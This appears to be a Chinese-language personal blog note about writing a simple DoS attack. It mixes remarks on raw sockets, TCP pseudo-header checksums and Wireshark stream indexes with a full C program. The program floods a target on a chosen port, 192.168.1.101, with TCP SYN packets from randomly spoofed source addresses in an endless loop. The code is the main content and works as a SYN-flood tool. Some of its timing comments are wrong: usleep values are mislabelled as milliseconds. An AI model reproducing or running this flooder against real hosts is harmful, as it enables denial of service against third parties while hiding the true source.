简单DOS攻击

写在前面的：

1，在 socket(AF_INET,SOCK_RAW，IPPROTO_TCP)中，发出去的包会帮你计算ip的校验和，故在填充ip包头的时候可以不用管，也可设置为0，
但是tcp的校验和需要自己计算，且如果计算不对的话，可能达不到效果。

2，tcp的校验和还要包括伪首部，这是很重要的，否则计算也不对。

3，重发时间大概在   1.19 1.60 3.20 3.60  10.20  10.60 15.60  31.60

4，在ip 的identication字段，填写的是
  ⑤标识 (Identification)：占 16位。

IP软件在存储器中维持一个计数器，每产生一个数据报，

计数器就加 1，并将此值赋给标识字段。但这个“标识”并不是序号，

因为 IP是无连接的服务，数据报不存在按序接收的问题。

当数据报由于长度超过网络的 MTU 而必须分片时，

这个标识字段的值就被复制到所有的数据报的标识字段中。

相同的标识字段的值使分片后的各数据报片最后能正确地重装成为

原来的数据报。

在我发出去的每个包，即SYN包，id字段是递增的（从某个数开始，好像是6375吧），
但是，target回包的时候（SYN+ACK），这个字段都是0，为什么呢？？？（我知道了，是不是SYN+ACK）是很小的，不可能分片，故不需要这个id来重组。。。，只需要看见ip.src和ip.dst就可以）。



4，在用wireshark抓包的时候，会有个stream index字段（这个字段在包里面是没有的，它是ws自己添加的）功能是，标识每一次对话（ipa，porta，ipb，portb），如果多个包的双方都是一次对话，那么他的stream index就是一致的。即一次对话。

the stream index is an internal Wireshark mapping to: [IP address A, TCP port A, IP address B, TCP port B]

All the packets for the same tcp.stream value should have the same values for these fields (though the src/dest will be switched for A->B and B->A packets)

see the Statistics/Conversations/TCP tab in Wireshark to show a summary of these streams

http://stackoverflow.com/questions/6076897/follow-tcp-stream-where-does-field-stream-index-come-from

Statistics/Conversations/TCP
Statistics/Conversations/endpoints/tcp
可以看到这些索引号对应的数据流


5知道了，我发出去的包，没有回应的都是多播地址，超过224.0.0.0就不会回应了。。。。




6，还发现，如果发包太快，接收方不会持续re包，只会相应一次。。。把时间调到1秒间隔，效果相当好。
但是，达不到攻击要求，故还需要精确的间隔。如0.5秒。但是sleep做不到，用usleep可以精确到微妙。usleep（1000）表示0.1秒，即1毫秒，1000微秒。

#include <stdlib.h>#include <stdio.h>#include <string.h>#include <unistd.h>#include <fcntl.h>#include <netdb.h>#include <sys/socket.h>#include <netinet/in.h>#include <netinet/ip.h>#include <sys/types.h>#include <arpa/inet.h>#include <linux/tcp.h>#include <netdb.h>#include <time.h>#define oops(msg){perror(msg);exit(0);}void attack(int sockfd,struct sockaddr_in *target);// 攻击函数，target为目标地址unsigned short check_sum(unsigned short *addr,int prelen,int len);// tcp校验和函数，因为校验和还要有伪首部，prelen是计算伪首部部分的参数，// 伪首部包括ipsrc，ipdst，ip协议(这里是tcp，故为0x06），tcp长度int main(int ac,char**av){        /* 得到原始套接子，让自己构造的包能够发送出去。    //这种套接子可以自己构造tcp，且ip部分的校验和是由内核帮你完成的    不用计算ip校验和。*/    int sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);    if(sockfd<0)oops("socket");    const int on=1;    if(ac!=2)oops("usage:dstport");//dstport为扫描得到的target的开放端口。   struct sockaddr_in target;     /*构造攻击的目标地址 */    bzero(&target,sizeof(target));    target.sin_family=AF_INET;    target.sin_port=htons(atoi(av[1]));    if(inet_aton("192.168.1.101",&target.sin_addr)==0)oops("aton");    /* 设置套接子的IP_HDRINCL选项，打开该选项，可以手动构造ip头部，     * 且ip头部的校验和由内核维护。     * 如果不打开该选项，ip首部不能够手动构造，是内核维护的，首部中的协议     * 字段设置为调用socket函数时传递的第三个参数*/    if((setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)))<0)oops("setsocketopt");    /*一切就绪，开始像目标主机发包攻击*/    attack(sockfd,&target);}void attack(int sockfd,struct sockaddr_in *target){    char buff[128]={0};//初始化包。    struct ip *ip; //其实这里也可也用struct iphdr，不过struct ip 兼容性更好    struct tcphdr *tcp;    int ip_len;// 整个ip包长度（不含mac等）    ip_len=sizeof(struct ip)+sizeof(struct tcphdr);    /*构造ip头部*/    ip=(struct ip*)buff;    ip->ip_v=IPVERSION;    ip->ip_hl=sizeof(struct ip)>>2;//ip首部长度以4字节为单位,这里故除以4    ip->ip_tos=0;    ip->ip_len=htons(ip_len);//这里注意字节序列的切换，因为ip_len是2字节的    ip->ip_id=0;//表示校验和由内核维护。    //这里的id通常情况下是表示同一个ip包的各个分片的标识。这里设为0，由内核    //维护。    ip->ip_ttl=MAXTTL;    ip->ip_p=IPPROTO_TCP;    ip->ip_sum=0;//校验和设为0；    //这里的DF，MF，段偏移等字段没有设置，默认初始化0，没有问题。    ip->ip_dst=target->sin_addr;//将target的地址填入包中。         /*构造tcp头部*/    tcp=(struct tcphdr*)(buff+sizeof(struct ip));    tcp->source=htons(4000);//这里默认本地端口为4000；    tcp->dest=target->sin_port;    tcp->seq=0;    tcp->doff=5;//这个字段是头部偏移字段,占4位，表示头部的长度，    //以4字节为单位，这里tcp头部20字节，填入5（没有任何选项）    tcp->syn=1;//syn字段，占1位，其余flags默认0.    tcp->check=0;//这里的校验和要先填入0，不然在计算校验和时会陷入鸡生蛋，蛋生鸡的问题。    /*包已经大部分构造好了，还差ip.src和tcp校验和，这里采取的随机生成     * ip.src，故校验和要计算，每次随机生成ip.src，就发包。*/    while(1)    {srand(time(0));//随机种子，不然每次随机都是一样的。ip->ip_src.s_addr=random();//这里不用关心字节顺序，反正是随机的。printf("random ip %s\n",inet_ntoa(ip->ip_src));//可以打印看看。/*参数解释，其中6是指跨越ip首部的6个short型，到达ip.src的位置， * 8是指，参与tcp的伪首部，包括ip.src,ip.dst,共8个short。 * 当然，伪首部还有协议类型和tcp长度，这里在后面细说， * 20，指tcp头部长度。*/tcp->check=0;//很重要，如果不初始化，那么后面的包会隔一个就校验和为0，然后隔一个正确//探索了好久，打印了n多信息才发现。。tcp->check=check_sum(((unsigned short*)ip+6),8,20);sendto(sockfd,buff,ip_len,0,(struct sockaddr*)target,sizeof(struct sockaddr_in));    }}unsigned short check_sum(unsigned short *addr,int prelen,int len){    usleep(100000);//停留1毫秒，这个后面解释。    unsigned long sum=0;    /*伪首部之ip部分*/    while(prelen>1)    {sum+=*addr++;prelen-=sizeof(unsigned short);    }    if(prelen)sum+=*(unsigned char*)addr;    /*伪首部之协议类型和tcp长度*/    sum=sum+htons(0x0006)+htons(0x0014);    //0x0006即tcp协议，0x0014即tcp长度20.注意，这里长度包括tcp的数据    //部分，但这里没有数据，只有头部。且这两个数据要单方面计算，不能组合。       /*校验和的tcp部分*/     while(len>1)    {sum+=*addr++;len-=sizeof(unsigned short);    }    if(len)sum+=*(unsigned char*)addr;    /*校验和是short型，若超过了，要处理*/    while(sum>>16)sum=(sum>>16)+(sum&0xffff);    return (unsigned short)~sum;}/*这个程序可以实现已知攻击者的ip和开放端口的攻击， * 但通过试验发现，如果发包频率为1个/s，那么可以看到target会连续的 * 会送相应的SYN+ACK包，可以达到效果，但这基本上起步到作用。 * 但是，如果发包太快，发现target只会响应一次ACK+SYN（针对每个包） * 我也不知道是什么情况*/